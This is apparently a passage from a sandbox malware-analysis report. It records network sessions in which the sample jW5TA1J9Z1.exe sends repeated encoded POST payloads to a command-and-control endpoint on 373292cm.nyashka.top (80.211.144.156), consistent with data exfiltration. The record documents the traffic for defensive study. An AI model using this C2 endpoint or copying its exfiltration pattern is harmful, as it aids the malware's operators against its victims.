                                                                    Aug 21, 2024 10:03:40.958832979 CEST2544OUTData Raw: 5f 54 5c 56 51 42 54 5b 5b 5f 5a 51 59 51 58 5e 57 5c 5d 5c 57 59 53 5a 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _T\VQBT[[_ZQYQX^W\]\WYSZYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.;0'!+73!)4\?>[<> 44+44=Y8&F$.Y/=
                                                                    Aug 21, 2024 10:03:41.276444912 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:41.405703068 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    33192.168.2.76539180.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:41.581338882 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:41.927561045 CEST2544OUTData Raw: 5f 5d 5c 5f 54 42 51 5d 5b 5f 5a 51 59 52 58 5f 57 51 5d 52 57 5c 53 5e 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _]\_TBQ][_ZQYRX_WQ]RW\S^YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.830".?# 1\==7+..?/Y743?)X7*,>&F$.Y/1
                                                                    Aug 21, 2024 10:03:41.959953070 CEST1236OUTData Raw: 09 3f 50 14 3a 37 0c 22 34 3d 31 27 38 3c 06 5a 02 31 2b 13 38 06 31 3b 0c 39 1b 1b 3c 04 06 5c 30 01 2f 16 3a 05 17 3a 34 5f 3e 57 26 3f 27 21 12 2a 20 20 30 00 25 0f 2c 06 3e 1f 34 56 0f 2e 08 28 53 15 32 5b 09 2d 35 2e 0c 09 33 3c 20 2f 09 39
                                                                    Data Ascii: ?P:7"4=1'8<Z1+81;9<\0/::4_>W&?'!* 0%,>4V.(S2[-5.3< /9_.89.9 -R=\;:&3E3V5=)??%PC#6$3?7+1:9#<9;10[U<,"#>T;=W&,_4=17>$<683?9?]V;:1Y5,'(2&2081X??<!,!Z2* %
                                                                    Aug 21, 2024 10:03:42.264672995 CEST25INHTTP/1.1 100 Continue


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    34192.168.2.76539280.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:42.347735882 CEST331OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 156172
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:42.693371058 CEST12360OUTData Raw: 5a 56 59 57 54 48 51 5d 5b 5f 5a 51 59 50 58 55 57 5c 5d 5d 57 5b 53 59 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZVYWTHQ][_ZQYPXUW\]]W[SYYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-.36><X#=*7<>?[#Z7,44#()7# 6;&F$.Y/
                                                                    Aug 21, 2024 10:03:42.698303938 CEST2472OUTData Raw: 26 07 0a 1c 3f 01 06 3a 04 29 29 53 34 07 04 3d 36 56 04 1d 0c 28 28 13 25 2e 37 14 30 5b 18 2c 31 2f 02 34 09 34 09 59 3d 59 2d 54 0e 08 39 2a 30 35 2b 1c 25 2e 29 1c 09 0b 22 0e 31 28 31 06 0c 05 00 56 20 41 1e 56 32 2a 51 18 06 3c 5c 19 0e 17
                                                                    Data Ascii: &?:))S4=6V((%.70[,1/44Y=Y-T9*05+%.)"1(1V AV2*Q<\]4X:$Y(6=_R3/"Y!$&Y6_2TVX,3898<83@,3#&<,7R4+:3>JX;3#,:@<(+'$Z<"%#(<<8;V>,A*\:^+T<?)3?Y!Y+&^#X<=*?<=92<_7?8$Z+%0/
                                                                    Aug 21, 2024 10:03:42.698338032 CEST4944OUTData Raw: 07 2e 0c 25 3e 0d 1e 03 0a 06 28 24 31 21 33 00 3a 21 3d 52 31 41 5f 5c 3d 3b 2f 34 3f 21 0f 0c 2a 07 3b 5f 00 58 08 5d 3e 3a 08 3b 26 22 2b 16 3b 29 26 00 33 3f 13 35 39 00 30 24 37 57 52 5a 3f 29 53 14 0b 05 0b 13 3c 3d 37 03 29 5c 2b 18 0b 02
                                                                    Data Ascii: .%>($1!3:!=R1A_\=;/4?!*;_X]>:;&"+;)&3?590$7WRZ?)S<=7)\+-Y9R(3;X$\8?33_5^01.;8*%XX3271*6[-3!=4?T=6$]2E=29&_<""&$0:2/9X1T?_19-Q0= = &><"2&W048.;Y;U7'[_(= !X3'S8)" >
                                                                    Aug 21, 2024 10:03:42.698434114 CEST4944OUTData Raw: 0e 3f 0b 5c 30 03 0b 52 15 11 3f 59 26 3b 06 18 34 14 0f 11 2a 5c 22 1a 31 31 52 32 3a 3a 1a 3e 3e 03 09 09 03 2e 32 28 05 2c 24 28 38 00 20 20 0c 3d 2a 51 0e 0b 5a 24 3c 5f 05 1a 09 20 22 09 33 31 3a 26 3a 3b 25 1c 0a 11 04 0b 3f 35 28 15 31 3c
                                                                    Data Ascii: ?\0R?Y&;4*\"11R2::>>.2(,$(8 =*QZ$<_ "31:&:;%?5(1<%]=-?.>5$2.0$<?9:U3X&: >-)>7 8%#=+.:2[*8?"X0 ?2QR((X46/5))8+91W3..4 38Z.W:8!<3.(T90-Y4198<//V>:'?R?-20$'-
                                                                    Aug 21, 2024 10:03:42.698474884 CEST4944OUTData Raw: 01 2d 03 5a 29 59 23 32 3d 03 27 2f 06 5a 3a 34 3f 32 09 15 0a 5e 03 53 3b 5b 2e 3b 23 04 2b 54 15 2d 5a 3c 0e 20 58 2a 3c 21 0b 21 00 57 5f 1f 3a 2c 28 14 22 33 44 1a 33 3d 24 5e 10 39 18 2a 3c 07 3c 58 20 58 3f 51 39 2d 27 36 2b 38 47 5f 38 32
                                                                    Data Ascii: -Z)Y#2='/Z:4?2^S;[.;#+T-Z< X*<!!W_:,("3D3=$^9*<<X X?Q9-'6+8G_82!X+;\.0<8?^$T -';^7\2-%3AZ=;8<1(>>8Y9;'2/'<.?1!%<1$?9.+WY# +8=X&*^6:Z +W6-Z.-)P<-X!.*?8>;<.!W VS'_';11
                                                                    Aug 21, 2024 10:03:42.698577881 CEST4944OUTData Raw: 09 0d 49 14 32 00 5f 07 32 3b 15 0d 02 2e 38 03 3f 0b 2e 34 21 1c 20 21 0d 38 38 59 38 3c 3c 11 0e 21 5a 15 3e 26 2d 5a 0c 5f 05 1b 24 32 21 2f 36 31 28 05 07 3d 22 59 0b 16 3e 2e 3a 5a 05 09 3b 28 07 1e 07 5a 13 28 0f 3d 1a 38 2d 54 34 03 33 00
                                                                    Data Ascii: I2_2;.8?.4! !88Y8<<!Z>&-Z_$2!/61(="Y>.:Z;(Z(=8-T432Y\-=<01\_];/]6?$<94+:3)>"41.V>71;(+124)X884?;<" =< :2:=3%X>2#& $(X]$X<8@?*1"0'>!<.19? 2*?2;!030<88?+;VE*.++%]
                                                                    Aug 21, 2024 10:03:42.698905945 CEST2472OUTData Raw: 0c 07 21 5f 3a 36 39 1c 26 02 09 1d 37 05 5f 07 22 2c 3d 59 37 3a 0f 1b 3f 05 05 38 14 39 02 03 31 3b 17 2f 00 5c 36 3e 34 09 0f 11 3e 07 23 54 3e 03 0e 55 31 2e 59 34 05 5b 02 17 0d 24 30 5b 0a 3e 07 2b 3d 56 03 0e 3a 03 2b 5c 3c 0d 26 04 0b 0f
                                                                    Data Ascii: !_:69&7_",=Y7:?891;/\6>4>#T>U1.Y4[$0[>+=V:+\<&&192[<<8%(0.2>)(9882=+8%R?X)=#?V!UT114648,#"1I%=\Z?-61([<W8T+48^?#?5)="44#"/8":;4[^>,'""%31:Q'W97Z\>Y%8^)[+T>
                                                                    Aug 21, 2024 10:03:42.703344107 CEST4944OUTData Raw: 3f 1f 0e 1a 32 39 1a 15 38 55 31 16 3b 5f 17 3f 2b 24 0e 5c 29 5a 28 5f 30 56 36 39 30 55 34 1a 26 3b 20 59 2f 2c 3b 5b 3a 1d 56 37 05 1a 3d 07 0d 3a 01 2e 24 0b 2d 25 06 5b 1e 29 32 05 04 58 27 38 00 5e 0a 32 19 34 27 04 17 1f 05 58 13 31 31 06
                                                                    Data Ascii: ?298U1;_?+$\)Z(_0V690U4&; Y/,;[:V7=:.$-%[)2X'8^24'X118-:8^;^58]1=,?.3;_^5="*]8Z?9#[034V: =<ZX4Z/3Y:QT^$0'Z26?=92^:48';Q,>[#;X&$9-?,6 #Q&Z;5?'W!2@1?2"?=]
                                                                    Aug 21, 2024 10:03:42.703375101 CEST4944OUTData Raw: 38 58 3c 04 2d 30 06 5e 33 07 03 35 0f 38 2d 2b 09 3e 20 5d 31 5d 0a 2d 0e 3f 39 26 04 3b 29 13 20 59 3b 2c 23 29 28 05 06 00 29 2e 2c 5c 55 00 2f 33 10 1e 22 2a 1a 2a 3d 2d 2b 29 31 05 32 0d 3d 07 24 5e 38 3f 52 10 24 05 2d 17 25 3e 26 57 08 17
                                                                    Data Ascii: 8X<-0^358-+> ]1]-?9&;) Y;,#)().,\U/3"**=-+)12=$^8?R$-%>&W'>50-]));=&!$.Y28(\'3+Z2+, #$*=4==-Y"0T$X52182!). _#Y(!U)/'>-*<=7ST/4>!#38):<;7Z= 703(3+$],]8T#)U15'V!W6[=>::"
                                                                    Aug 21, 2024 10:03:42.703393936 CEST4944OUTData Raw: 0b 03 3c 12 32 0d 36 0d 3e 57 1c 36 32 15 21 03 3c 07 03 57 3a 1a 5b 1a 3f 5b 3e 1f 3e 11 27 1c 3f 5f 27 5a 35 31 3a 29 28 00 06 5b 32 3b 03 0e 0d 2c 36 3d 3f 10 3f 57 14 04 03 1b 3f 57 3b 2a 24 55 52 5d 35 21 05 08 22 3f 1e 14 23 2c 18 3e 33 02
                                                                    Data Ascii: <26>W62!<W:[?[>>'?_'Z51:)([2;,6=??W?W;*$UR]5!"?#,>3"(?8: /'-7<X:<2;/5E1$X1>6>4< ,^S9/;W934!<*3><<%*_89Y=3:>+$-8%.3??1:#]?.[50;39%,^88#. 2#.U8)=752.!U>
                                                                    Aug 21, 2024 10:03:43.051865101 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:43.795121908 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    35192.168.2.76539380.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:42.479541063 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:42.833745956 CEST2544OUTData Raw: 5f 5d 59 54 51 42 54 5f 5b 5f 5a 51 59 55 58 50 57 5b 5d 5a 57 5d 53 5b 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _]YTQBT_[_ZQYUXPW[]ZW]S[YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.X;A#-7#&*-?9+-8 <(7??:(#=_.>&F$.Y/-
                                                                    Aug 21, 2024 10:03:43.157983065 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:43.362962008 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    36192.168.2.76539480.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:43.535428047 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:43.920815945 CEST2544OUTData Raw: 5f 54 5c 51 54 46 51 5b 5b 5f 5a 51 59 56 58 52 57 51 5d 52 57 5f 53 5b 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _T\QTFQ[[_ZQYVXRWQ]RW_S[YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.Y/("] **= Y+6).#X4 "#(+X7;&F$.Y/!
                                                                    Aug 21, 2024 10:03:44.212580919 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:44.345588923 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    37192.168.2.76539580.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:44.653165102 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:45.006156921 CEST2544OUTData Raw: 5f 5d 5c 5f 51 40 54 58 5b 5f 5a 51 59 51 58 56 57 5c 5d 5f 57 50 53 5a 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _]\_Q@TX[_ZQYQXVW\]_WPSZYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.;#.8 Z=[+<>&([<#<#Q72<W+:'#1/.&F$.Y/=
                                                                    Aug 21, 2024 10:03:45.347588062 CEST25INHTTP/1.1 100 Continue


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    38192.168.2.76539680.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:45.418178082 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1844
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:45.771471977 CEST1844OUTData Raw: 5f 51 59 52 54 46 51 5d 5b 5f 5a 51 59 51 58 55 57 58 5d 52 57 5f 53 58 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _QYRTFQ][_ZQYQXUWX]RW_SXYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.Y8;D">(#5X*=(X?>Z)-"<371?9?\ 3%\/&F$.Y/=
                                                                    Aug 21, 2024 10:03:46.100972891 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:46.234527111 CEST308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 25 0d 2a 0b 3e 10 32 05 28 55 25 30 32 54 3e 03 09 1d 2a 03 04 01 24 38 26 04 31 10 3c 55 24 5d 29 5c 3c 2e 32 56 31 2f 3b 5b 39 0e 2b 5d 0c 13 21 06 20 03 32 5d 26 2c 06 5c 2a 28 2f 18 35 3c 2a 5a 3f 04 00 08 3c 01 2c 12 2b 29 27 1e 2b 29 35 0a 38 01 21 5c 2d 0e 2d 0c 34 14 2b 52 0d 11 24 1e 3f 04 2e 0f 3e 10 3c 00 23 38 20 01 33 03 26 50 31 22 39 0b 27 39 27 02 26 32 25 51 24 1f 2a 09 32 5d 36 58 31 11 35 51 22 18 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: %*>2(U%02T>*$8&1<U$])\<.2V1/;[9+]! 2]&,\*(/5<*Z?<,+)'+)58!\--4+R$?.><#8 3&P1"9'9'&2%Q$*2]6X15Q"#T,"W3UV


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    39192.168.2.75299580.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:45.545778990 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:45.896255016 CEST2544OUTData Raw: 5f 57 5c 53 54 45 54 5e 5b 5f 5a 51 59 5f 58 52 57 50 5d 5e 57 59 53 5d 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _W\STET^[_ZQY_XRWP]^WYS]YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U./0'![;7"*[3<.?>4#/0!";<:? /&F$.Y/
                                                                    Aug 21, 2024 10:03:46.227910995 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:46.359456062 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    40192.168.2.75299680.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:46.690933943 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:47.036875963 CEST2544OUTData Raw: 5f 55 5c 50 54 48 54 5b 5b 5f 5a 51 59 50 58 5e 57 5e 5d 5a 57 5f 53 5f 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _U\PTHT[[_ZQYPX^W^]ZW_S_YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.,<"^ =]*++>-< #Z<#<W?)(736/.&F$.Y/
                                                                    Aug 21, 2024 10:03:47.364295959 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:47.499989986 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    41192.168.2.75299780.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:47.633029938 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:47.990055084 CEST2544OUTData Raw: 5f 50 5c 56 51 47 54 51 5b 5f 5a 51 59 52 58 54 57 58 5d 53 57 5a 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _P\VQGTQ[_ZQYRXTWX]SWZS\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.\,U'B6-<70:=4Y+*([?Y ?# ! (;X40,>&F$.Y/1
                                                                    Aug 21, 2024 10:03:48.306845903 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:48.437634945 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    42192.168.2.75299880.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:48.571717024 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2532
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:48.934050083 CEST2532OUTData Raw: 5a 51 5c 55 54 46 54 5d 5b 5f 5a 51 59 57 58 57 57 5f 5d 58 57 59 53 5f 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
